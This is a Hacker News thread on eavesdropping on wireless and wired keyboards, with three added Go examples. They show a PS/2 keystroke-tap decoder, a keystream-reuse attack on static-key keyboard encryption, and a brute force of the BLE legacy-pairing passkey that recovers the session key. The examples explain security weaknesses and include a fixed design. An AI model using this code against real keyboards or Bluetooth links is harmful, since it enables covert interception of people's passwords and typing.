
Eavesdropping on a wireless keyboard (2013) - trucious
http://www.windytan.com/2013/03/eavesdropping-on-wireless-keyboard.html
======
3stripe
Reminds me of an episode of Due South (the tv series about a Canadian mountie
working as a detective in Chicago) in which he correctly works out a password
from just the sound of someone typing it.

Turns out this is not so far-fetched after all:

"If you have an audio recording of somebody typing on an ordinary computer
keyboard for fifteen minutes or so, you can figure out everything they typed."

https://freedom-to-tinker.com/blog/felten/acoustic-snooping-typed-information/

~~~
dominicgs
There was a great talk at Defcon in 2009 about sniffing keystrokes with
voltmeters and lasers. It's worth watching the video[1] if you're interested
in this audio technique.

The first part of their presentation uses a novel method to pick up PS/2
keystrokes from a system's ground connection. This presentation was what led
me to design the PS/2 tap[2] to sniff keystrokes with my sound card.

[1] https://www.youtube.com/watch?v=9zq9DQAbWmU
[2] https://github.com/dominicgs/PS2_tap
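
An added example (written for this page, not code from the thread or from the PS2_tap project) of the decoding step that turns a tapped PS/2 DATA line into keystrokes. It assumes the sound card capture has already been reduced to a sequence of DATA-line samples taken on each falling CLOCK edge (that sampling is not shown); the frame layout is the standard 11-bit device-to-host PS/2 frame and the scancodes are Set 2. The Capture helper and the six-entry scancode table are constructed so the block runs offline:

```go
package main

import (
	"errors"
	"fmt"
)

// Scancode Set 2 make codes for the few keys used in the constructed
// capture below; a real decoder carries the whole table.
var set2 = map[byte]string{
	0x33: "h", 0x24: "e", 0x4B: "l", 0x44: "o", 0x29: " ", 0x5A: "\n",
}

// encodeFrame builds the 11-bit device-to-host PS/2 frame for one byte:
// start bit (0), 8 data bits LSB first, odd parity bit, stop bit (1).
// It exists only to fabricate the test capture.
func encodeFrame(b byte) []bool {
	bits := []bool{false}
	ones := 0
	for i := 0; i < 8; i++ {
		bit := (b>>uint(i))&1 == 1
		if bit {
			ones++
		}
		bits = append(bits, bit)
	}
	// Odd parity: the parity bit makes the count of ones in data+parity odd.
	bits = append(bits, ones%2 == 0)
	return append(bits, true)
}

// DecodeFrames walks DATA-line samples taken on each falling CLOCK edge
// and returns the framed bytes, rejecting any frame with a bad start or
// stop bit or a parity error (what a noisy tap or a missed edge looks like).
func DecodeFrames(bits []bool) ([]byte, error) {
	if len(bits)%11 != 0 {
		return nil, errors.New("bit stream is not a whole number of 11-bit frames")
	}
	var out []byte
	for f := 0; f < len(bits); f += 11 {
		fr := bits[f : f+11]
		if fr[0] || !fr[10] {
			return out, fmt.Errorf("frame %d: bad start/stop bit", f/11)
		}
		var b byte
		ones := 0
		for i := 0; i < 8; i++ {
			if fr[1+i] {
				b |= 1 << uint(i)
				ones++
			}
		}
		if fr[9] {
			ones++
		}
		if ones%2 != 1 {
			return out, fmt.Errorf("frame %d: parity error", f/11)
		}
		out = append(out, b)
	}
	return out, nil
}

// Keystrokes turns the scancode stream into typed text. A key release is
// the make code prefixed by 0xF0, so those pairs are skipped.
func Keystrokes(codes []byte) string {
	var s []byte
	for i := 0; i < len(codes); i++ {
		if codes[i] == 0xF0 {
			i++ // skip the released key's make code
			continue
		}
		if k, ok := set2[codes[i]]; ok {
			s = append(s, k...)
		}
	}
	return string(s)
}

// Capture fabricates the bit stream a tap would see for text typed on a
// Set 2 keyboard, with every key pressed and then released.
func Capture(text string) []bool {
	rev := map[string]byte{}
	for code, key := range set2 {
		rev[key] = code
	}
	var bits []bool
	for _, ch := range text {
		code := rev[string(ch)]
		bits = append(bits, encodeFrame(code)...)
		bits = append(bits, encodeFrame(0xF0)...)
		bits = append(bits, encodeFrame(code)...)
	}
	return bits
}

func main() {
	codes, err := DecodeFrames(Capture("hello\n"))
	if err != nil {
		panic(err)
	}
	fmt.Printf("%x -> %q\n", codes, Keystrokes(codes))
}
```

The parity check is the part worth keeping when adapting this to a real capture: a tap on the ground line is a noisy signal, and a frame that fails parity is more likely a sampling error than a real keystroke, so drop it rather than guess.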

------
kabdib
The problem is that the company who's saying "Trust us, we have 128 bit
encryption in our product" isn't giving you enough information to make an
informed decision about how secure the device really is.

Choosing a keyboard because the box says "128 bit encryption" doesn't help if
the manufacturer bakes in the same key on every device. Or a predictable key.
Or really, any static session key even if it varies by device serial number or
something like that. And a marketing or advertising guy doesn't know this,
they just see a checkbox they can stick on the artwork. "Just get that 128 bit
stuff in there so we aren't lying" is the most likely scenario for something
like a keyboard, where competition is tough and margins are wafer thin.

Personally I'd use copper if I was at all worried, because the likelihood of
some random firmware engineer getting a security protocol right is pretty
slim.
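
To make the point above concrete, an added example (written for this page, not code from the thread or from any keyboard vendor) of what "128-bit encryption" with a static key buys an eavesdropper, beside a design that fixes it. The factory key, the HID report layout and the Sender type are assumptions for illustration: the weak version is AES-CTR with a fixed key and IV, which is what "same key on every device, no per-packet nonce" amounts to; the fixed version is an AES-GCM packet format with a counter nonce under a key established per device at pairing.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// factoryKey is a hypothetical 128-bit key baked into every unit; it also
// stands in for a key derived predictably from the serial number.
var factoryKey = []byte("0123456789abcdef")

// report builds an 8-byte USB HID boot keyboard report for one keystroke:
// modifiers, reserved, then up to six usage codes.
func report(usage byte) []byte {
	return []byte{0, 0, usage, 0, 0, 0, 0, 0}
}

// WeakEncrypt is "128-bit encryption" as a cheap radio might ship it:
// AES-CTR with a fixed key and a fixed IV, so every packet is XORed with
// the same keystream.
func WeakEncrypt(pt []byte) []byte {
	block, _ := aes.NewCipher(factoryKey)
	iv := make([]byte, 16) // all zero, never changes
	ct := make([]byte, len(pt))
	cipher.NewCTR(block, iv).XORKeyStream(ct, pt)
	return ct
}

// KeystreamReuseAttack: with c = p XOR ks for every packet, an eavesdropper
// who knows one plaintext (say, the Enter at the end of each line) gets
// c1 XOR c2 XOR p1 = p2 for any other packet.
func KeystreamReuseAttack(knownPt, knownCt, targetCt []byte) []byte {
	pt := make([]byte, len(targetCt))
	for i := range pt {
		pt[i] = knownPt[i] ^ knownCt[i] ^ targetCt[i]
	}
	return pt
}

// SameCiphertext: even with no known plaintext, equal keystrokes give equal
// ciphertexts, so the "cipher" is a substitution cipher over keystrokes.
func SameCiphertext(a, b []byte) bool { return string(a) == string(b) }

// Sender is the corrected design: a per-device key established at pairing
// and a packet counter used as the AES-GCM nonce, sent in the clear so the
// receiver can decrypt, authenticate and reject replays.
type Sender struct {
	aead    cipher.AEAD
	counter uint64
}

func NewSender(pairedKey []byte) (*Sender, error) {
	block, err := aes.NewCipher(pairedKey)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return &Sender{aead: aead}, nil
}

// Encrypt returns nonce || ciphertext || tag. The counter never repeats for
// the life of the key, so equal keystrokes look unrelated on the air.
func (s *Sender) Encrypt(pt []byte) []byte {
	s.counter++
	nonce := make([]byte, 12)
	binary.BigEndian.PutUint64(nonce[4:], s.counter)
	return s.aead.Seal(nonce, nonce, pt, nil)
}

func main() {
	enter1, enter2 := WeakEncrypt(report(0x28)), WeakEncrypt(report(0x28))
	secret := WeakEncrypt(report(0x0B)) // 'h'
	fmt.Println("static key, same keystroke, same ciphertext:", SameCiphertext(enter1, enter2))
	fmt.Printf("recovered report: %x\n", KeystreamReuseAttack(report(0x28), enter1, secret))

	key := make([]byte, 16)
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	s, _ := NewSender(key)
	fmt.Println("fixed design, same keystroke twice:",
		SameCiphertext(s.Encrypt(report(0x28)), s.Encrypt(report(0x28))))
}
```

Note that the attack needs no knowledge of the key at all, which is why "128 bit" on the box says nothing: the strength of the block cipher is irrelevant once the keystream repeats. The fix needs the counter to be persisted across power cycles (or a fresh key negotiated at every power-up), or the nonce repeats and GCM fails in the same way.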

------
dan_bk
> Some time ago, I needed to find a new wireless keyboard. With the level of
> digital paranoia that I have, my main priority was security.

If _my main priority was security_, then I would never even think about
wireless (network, keyboard, etc.).

~~~
dnautics
Do you think a wired keyboard might emit tappable RF? Should users take care
to not have coils in their wires? Do solenoided keyboards (with the flexy
cord coils) also pose a transmission risk?

~~~
kpreid
The cable is the _least_ likely part to be the source of the problem. The data
lines are inside a shield, and in USB they are balanced (“D+” and “D-”). Both
of these act to prevent radiation of the signals.

If a keyboard radiates it is likely to be either from the unshielded,
unbalanced matrix wires going to the keyswitches, or leakage from the
controller going onto the _outside_ of the shield. (I think the latter could
be reduced by using (more/bigger) decoupling capacitors, i.e. shorting out the
RF.)

Coiling a wire does not generally make it a more effective antenna; it may or
may not make it _less_ effective depending on the circumstances. (The reason
some antennas are coiled is to get the same length of conductor into a smaller
space.)

------
csmattryder
So how far can you go and still eavesdrop on the signal? I haven't the first
clue regarding signals, but I guess you'd have to plant a bug on the underside
of the desk as opposed to a radar dish on the other side of the wall?

But yeah, another post from windytan that's left me amazed. If you're
uninitiated, this is the same woman that figured out how to read from bus
timetable display radio signals [1].

I'll stick to my USB wired keyboard for now, though, until encrypted wireless
keyboards come down from £70-100.

[1]: http://www.windytan.com/2013/11/decoding-radio-controlled-bus-stop.html

~~~
chmars
… or get a wireless keyboard with Bluetooth – it should be safe _enough_.

~~~
sp332
If you get an Ubertooth (http://ubertooth.sourceforge.net/) you can sniff
Bluetooth as well. If you use the default PIN (0000 or 1234) then it's
possible to decrypt the signal. Here's an overview of how feasible decryption
is: http://css.csail.mit.edu/6.858/2012/projects/echai-bendorff-cathywu.pdf

Also, Bluetooth LE provides no eavesdropping protection. If an attacker can
capture the pairing frames, they may be able to determine the "long-term key".
Here's the NIST guidance paper on Bluetooth security:
[http://www.nist.gov/customcf/get_pdf.cfm?pub_id=911133](http://www.nist.gov/customcf/get_pdf.cfm?pub_id=911133)

The attack surface can be minimized if the keyboard manufacturer implements
crypto properly, requires encryption at the protocol level, uses a long and
complex PIN, etc. The manufacturer with the best reputation right now is
Microsoft. They got burned pretty hard when their proprietary wireless
encryption was hacked back in 2007, and it looks like their Bluetooth
keyboards are doing everything right.

~~~
dominicgs
> Also, Bluetooth LE provides no eavesdropping protection. If an attacker can
> capture the pairing frames, they may be able to determine the "long-term
> key"

There's a practical attack for that, and it's quick. It also uses
Ubertooth[1].

For all Bluetooth keyboards that I've seen in the past ~5 years the pairing
process uses one of the "Secure Simple Pairing" modes. None of these have been
broken, although "Just Works" is probably vulnerable. The keyboards that I've
seen use the "enter a 6 digit number" mode, which is not susceptible to the man
in the middle attacks that have been used against Bluetooth keyboards before[2].

Disclosure: I work on the Ubertooth and related projects.

[1] https://www.usenix.org/conference/woot13/workshop-program/presentation/ryan

[2] https://www.youtube.com/watch?v=X0RUN6SB6c8
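
An added example (written for this page, not code from the thread, from the Ubertooth project or from the WOOT paper) showing why capturing the pairing frames of LE legacy pairing is enough, which is the point of both comments above: the confirm value Mconfirm depends only on the TK (0 for Just Works, the 6-digit passkey otherwise) and on values sent in the clear, so the TK is a brute force of at most a million candidates, and the STK that encrypts the key distribution phase (where the LTK is sent) follows directly from it. The c1 and s1 functions are implemented from the Bluetooth Core Specification (Vol 3, Part H, security functions c1 and s1) in the spec's most-significant-octet-first order; the pairing capture is constructed, not a real trace, and the Pairing Request/Response bytes in it are placeholders. Fields taken from a real over-the-air capture are little-endian and must be byte-reversed before use.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/binary"
	"fmt"
)

// e is the Bluetooth security function e: one AES-128 block encryption.
// All 128-bit values here are in the spec's most-significant-octet-first
// order; fields captured off the air are little-endian and must be reversed.
func e(key, plaintext [16]byte) [16]byte {
	block, err := aes.NewCipher(key[:])
	if err != nil {
		panic(err)
	}
	var out [16]byte
	block.Encrypt(out[:], plaintext[:])
	return out
}

func xor16(a, b [16]byte) [16]byte {
	var out [16]byte
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// PairingCapture is what a sniffer gets from LE legacy pairing: the 7-octet
// Pairing Request/Response payloads, both address types and addresses, and
// the random and confirm values exchanged before encryption starts.
type PairingCapture struct {
	Preq, Pres [7]byte
	Iat, Rat   byte
	Ia, Ra     [6]byte
	Mrand      [16]byte
	Mconfirm   [16]byte
	Srand      [16]byte
}

// c1 computes the confirm value: e(k, e(k, r XOR p1) XOR p2) with
// p1 = pres || preq || rat' || iat' and p2 = padding || ia || ra.
func c1(k, r [16]byte, pc PairingCapture) [16]byte {
	var p1, p2 [16]byte
	copy(p1[0:7], pc.Pres[:])
	copy(p1[7:14], pc.Preq[:])
	p1[14], p1[15] = pc.Rat, pc.Iat
	copy(p2[4:10], pc.Ia[:])
	copy(p2[10:16], pc.Ra[:])
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 computes the STK: e(k, r1' || r2') from the low 64 bits of Srand and Mrand.
func s1(k, r1, r2 [16]byte) [16]byte {
	var r [16]byte
	copy(r[0:8], r1[8:])
	copy(r[8:16], r2[8:])
	return e(k, r)
}

// tkFromPasskey is the 6-digit passkey as a 128-bit TK (Just Works: 0).
func tkFromPasskey(passkey uint32) [16]byte {
	var tk [16]byte
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// RecoverTK tries every passkey until c1 over the captured Mrand reproduces
// the captured Mconfirm: at most 10^6 candidates at two AES calls each.
func RecoverTK(pc PairingCapture) (uint32, bool) {
	for pk := uint32(0); pk < 1000000; pk++ {
		got := c1(tkFromPasskey(pk), pc.Mrand, pc)
		if bytes.Equal(got[:], pc.Mconfirm[:]) {
			return pk, true
		}
	}
	return 0, false
}

// RecoverSTK derives the key under which the LTK is later distributed.
func RecoverSTK(pc PairingCapture, passkey uint32) [16]byte {
	return s1(tkFromPasskey(passkey), pc.Srand, pc.Mrand)
}

// ConstructedCapture fabricates a pairing exchange (not a real trace) in
// which the initiator used the given passkey; Preq/Pres are placeholders.
func ConstructedCapture(passkey uint32) PairingCapture {
	pc := PairingCapture{
		Preq: [7]byte{0x01, 0x04, 0x00, 0x01, 0x10, 0x07, 0x07},
		Pres: [7]byte{0x02, 0x04, 0x00, 0x01, 0x10, 0x07, 0x07},
		Ia:   [6]byte{0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6},
		Ra:   [6]byte{0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6},
	}
	for i := range pc.Mrand {
		pc.Mrand[i], pc.Srand[i] = byte(0x10+i), byte(0x80+i)
	}
	pc.Mconfirm = c1(tkFromPasskey(passkey), pc.Mrand, pc)
	return pc
}

func main() {
	pc := ConstructedCapture(123456)
	if pk, ok := RecoverTK(pc); ok {
		fmt.Printf("passkey %06d, STK %x\n", pk, RecoverSTK(pc, pk))
	}
}
```

The whole search is under a second on a laptop, which is why a passkey protects a legacy-pairing link only against an attacker who was not listening at pairing time; it is not a key, it is a 20-bit value checked through a public function. Once the STK is known the key distribution packets decrypt, the LTK falls out, and every later connection using that LTK can be decrypted too.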

~~~
sp332
I haven't seen many keyboards that seemed secure, but now that you mention it,
they are pretty old. Thanks for the update :)

------
higherpurpose
This is why Apple's iBeacon was _never_ going to be a viable method of
payment, unlike NFC. The range on Bluetooth is just too long to safely do
something like payments with it.

~~~
drdaeman
The range of Internet is incomparably greater, but we still somehow manage to
perform payments over that in a reasonably secure manner.

We just have to establish the secure channel and securely authenticate peers
to each other. The medium over which this is made is mostly irrelevant.

------
aoxfordca
If you don't have consent, this would be one of the RARE instances of a Title
I violation under the ECPA.

